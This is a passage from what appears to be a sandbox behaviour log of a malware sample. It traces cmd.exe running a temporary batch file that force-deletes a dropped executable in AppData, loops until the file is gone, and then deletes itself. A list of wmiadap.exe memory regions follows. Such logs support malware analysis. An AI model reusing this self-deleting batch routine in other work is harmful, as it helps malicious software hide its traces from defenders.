[0094.053] SetConsoleInputExeNameW () returned 0x1 [0094.053] GetConsoleOutputCP () returned 0x1b5 [0094.053] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.053] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.053] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0094.053] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0094.053] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.053] SetFilePointer (in: hFile=0x78, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0094.053] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.053] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0094.053] ReadFile (in: hFile=0x78, lpBuffer=0x49fc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef440, lpOverlapped=0x0 | out: lpBuffer=0x49fc6640*, lpNumberOfBytesRead=0x1ef440*=0xbd, lpOverlapped=0x0) returned 1 [0094.053] SetFilePointer (in: hFile=0x78, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0094.053] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49fc6640, cbMultiByte=4, lpWideCharStr=0x49fcc640, cchWideChar=8191 | out: lpWideCharStr=":d\r\no off\r\n") returned 4 [0094.053] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.053] GetFileType (hFile=0x78) returned 0x1 [0094.053] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.053] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0094.054] _tell (_FileHandle=3) returned 15 [0094.054] _close (_FileHandle=3) returned 0 [0094.054] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0094.054] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0094.054] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.054] SetFilePointer (in: hFile=0x78, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0094.054] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.054] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0094.054] ReadFile (in: hFile=0x78, lpBuffer=0x49fc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef440, lpOverlapped=0x0 | out: lpBuffer=0x49fc6640*, lpNumberOfBytesRead=0x1ef440*=0xb9, lpOverlapped=0x0) returned 1 [0094.054] SetFilePointer (in: hFile=0x78, lDistanceToMove=73, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x49 [0094.054] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49fc6640, cbMultiByte=58, lpWideCharStr=0x49fcc640, cchWideChar=8191 | out: lpWideCharStr="del /F /Q \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\"\r\n") returned 58 [0094.054] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.054] GetFileType (hFile=0x78) returned 0x1 [0094.054] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.054] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x49 [0094.054] _wcsicmp (_String1="del", _String2=")") returned 59 [0094.054] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0094.054] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0094.054] _wcsicmp (_String1="IF", _String2="del") returned 5 [0094.054] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0094.054] _wcsicmp (_String1="REM", _String2="del") returned 14 [0094.054] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0094.056] _tell (_FileHandle=3) returned 73 [0094.056] _close (_FileHandle=3) returned 0 [0094.056] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0094.056] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0094.056] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0094.056] GetConsoleTitleW (in: lpConsoleTitle=0x1ef024, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.057] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eeddc | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.057] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1ede6c | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.057] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee09c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee0a0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee09c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0094.057] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0094.057] _wcsicmp (_String1="iuoldw.exe", _String2=".") returned 59 [0094.057] _wcsicmp (_String1="iuoldw.exe", _String2="..") returned 59 [0094.057] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x20 [0094.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6b3a40 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.057] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", nBufferLength=0x104, lpBuffer=0x1ee4c0, lpFilePart=0x1ee4a8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", lpFilePart=0x1ee4a8*="iuoldw.exe") returned 0x2c [0094.057] SetErrorMode (uMode=0x0) returned 0x1 [0094.057] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming")) returned 0x2010 [0094.057] _wcsicmp (_String1="iuoldw.exe", _String2=".") returned 59 [0094.057] _wcsicmp (_String1="iuoldw.exe", _String2="..") returned 59 [0094.057] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x20 [0094.058] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", fInfoLevelId=0x0, lpFindFileData=0x6b3ebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6b3ebc) returned 0x6b46c0 [0094.058] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 1 [0094.058] FindNextFileW (in: hFindFile=0x6b46c0, lpFindFileData=0x6b3ebc | out: lpFindFileData=0x6b3ebc) returned 0 [0094.058] GetLastError () returned 0x12 [0094.058] FindClose (in: hFindFile=0x6b46c0 | out: hFindFile=0x6b46c0) returned 1 [0094.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.058] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.059] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fc41ac | out: lpMode=0x49fc41ac) returned 1 [0094.059] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.059] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fc41b0 | out: lpMode=0x49fc41b0) returned 1 [0094.059] SetConsoleInputExeNameW () returned 0x1 [0094.059] GetConsoleOutputCP () returned 0x1b5 [0094.059] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.059] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.060] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0094.060] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0094.060] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.060] SetFilePointer (in: hFile=0x78, lDistanceToMove=73, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x49 [0094.060] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.060] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x49 [0094.060] ReadFile (in: hFile=0x78, lpBuffer=0x49fc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef440, lpOverlapped=0x0 | out: lpBuffer=0x49fc6640*, lpNumberOfBytesRead=0x1ef440*=0x7f, lpOverlapped=0x0) returned 1 [0094.060] SetFilePointer (in: hFile=0x78, lDistanceToMove=137, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0094.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49fc6640, cbMultiByte=64, lpWideCharStr=0x49fcc640, cchWideChar=8191 | out: lpWideCharStr="if exist \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\" goto d\r\n") returned 64 [0094.060] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.060] GetFileType (hFile=0x78) returned 0x1 [0094.060] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.060] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0094.061] _tell (_FileHandle=3) returned 137 [0094.061] _close (_FileHandle=3) returned 0 [0094.061] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", nBufferLength=0x208, lpBuffer=0x1ef01c, lpFilePart=0x1eedc8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", lpFilePart=0x1eedc8*="iuoldw.exe") returned 0x2c [0094.061] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0094.061] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", fInfoLevelId=0x1, lpFindFileData=0x1eedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eedcc) returned 0xffffffff [0094.061] GetLastError () returned 0x2 [0094.061] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0094.061] GetLastError () returned 0x6 [0094.061] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.061] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.061] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.061] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fc41ac | out: lpMode=0x49fc41ac) returned 1 [0094.062] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.062] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fc41b0 | out: lpMode=0x49fc41b0) returned 1 [0094.062] SetConsoleInputExeNameW () returned 0x1 [0094.062] GetConsoleOutputCP () returned 0x1b5 [0094.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.062] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0094.062] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0094.062] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.062] SetFilePointer (in: hFile=0x78, lDistanceToMove=137, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0094.062] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.062] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0094.062] ReadFile (in: hFile=0x78, lpBuffer=0x49fc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef440, lpOverlapped=0x0 | out: lpBuffer=0x49fc6640*, lpNumberOfBytesRead=0x1ef440*=0x3f, lpOverlapped=0x0) returned 1 [0094.062] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49fc6640, cbMultiByte=63, lpWideCharStr=0x49fcc640, cchWideChar=8191 | out: lpWideCharStr="del /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"\r\n\n") returned 63 [0094.063] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.063] GetFileType (hFile=0x78) returned 0x1 [0094.063] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.063] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc8 [0094.064] _tell (_FileHandle=3) returned 200 [0094.064] _close (_FileHandle=3) returned 0 [0094.064] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0094.064] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0094.064] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0094.064] GetConsoleTitleW (in: lpConsoleTitle=0x1ef024, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.064] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eeddc | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.064] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1ede6c | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.064] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee09c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee0a0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee09c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0094.064] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0094.064] _wcsicmp (_String1="updaa5900b0.bat", _String2=".") returned 71 [0094.064] _wcsicmp (_String1="updaa5900b0.bat", _String2="..") returned 71 [0094.064] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat")) returned 0x2020 [0094.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6a5608 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.064] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", nBufferLength=0x104, lpBuffer=0x1ee4c0, lpFilePart=0x1ee4a8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", lpFilePart=0x1ee4a8*="updaa5900b0.bat") returned 0x34 [0094.064] SetErrorMode (uMode=0x0) returned 0x1 [0094.064] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010 [0094.064] _wcsicmp (_String1="updaa5900b0.bat", _String2=".") returned 71 [0094.064] _wcsicmp (_String1="updaa5900b0.bat", _String2="..") returned 71 [0094.064] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat")) returned 0x2020 [0094.065] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", fInfoLevelId=0x0, lpFindFileData=0x6a5b44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6a5b44) returned 0x6a39e8 [0094.065] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat")) returned 1 [0094.065] FindNextFileW (in: hFindFile=0x6a39e8, lpFindFileData=0x6a5b44 | out: lpFindFileData=0x6a5b44) returned 0 [0094.065] GetLastError () returned 0x12 [0094.065] FindClose (in: hFindFile=0x6a39e8 | out: hFindFile=0x6a39e8) returned 1 [0094.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.066] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fc41ac | out: lpMode=0x49fc41ac) returned 1 [0094.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.066] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fc41b0 | out: lpMode=0x49fc41b0) returned 1 [0094.066] SetConsoleInputExeNameW () returned 0x1 [0094.066] GetConsoleOutputCP () returned 0x1b5 [0094.067] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.067] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.067] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.067] GetLastError () returned 0x2 [0094.067] _get_osfhandle (_FileHandle=2) returned 0xb [0094.067] GetFileType (hFile=0xb) returned 0x2 [0094.067] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0094.067] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef414 | out: lpMode=0x1ef414) returned 1 [0094.067] _get_osfhandle (_FileHandle=2) returned 0xb [0094.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ef448 | out: lpConsoleScreenBufferInfo=0x1ef448) returned 1 [0094.067] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x49fd4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0094.068] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x49fd4640, nSize=0x2000, Arguments=0x1ef488 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0094.068] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49fd4640*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x1ef46c, lpReserved=0x0 | out: lpBuffer=0x49fd4640*, lpNumberOfCharsWritten=0x1ef46c*=0x21) returned 1 [0094.069] CmdBatNotification () returned 0x1 [0094.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.069] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.069] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fc41ac | out: lpMode=0x49fc41ac) returned 1 [0094.069] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.069] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fc41b0 | out: lpMode=0x49fc41b0) returned 1 [0094.069] SetConsoleInputExeNameW () returned 0x1 [0094.069] GetConsoleOutputCP () returned 0x1b5 [0094.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.069] exit (_Code=1) Process: id = "9" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x2af8a000" os_pid = "0x950" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x35c" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000bad4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1784 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1785 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1786 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1787 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1788 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1789 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1790 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1791 start_va = 0xffa80000 end_va = 0xffaaffff entry_point = 0xffa80000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 1792 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1793 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1794 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1795 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1796 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1797 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1798 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1799 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1800 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1801 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1802 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1803 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1804 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1805 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1806 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1807 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1808 start_va = 0x110000 end_va = 0x1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1809 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1810 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1811 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1812 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1813 start_va = 0x7fef51b0000 end_va = 0x7fef51d6fff entry_point = 0x7fef51b0000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 1814 start_va = 0x7fef5bb0000 end_va = 0x7fef5c35fff entry_point = 0x7fef5bb0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: 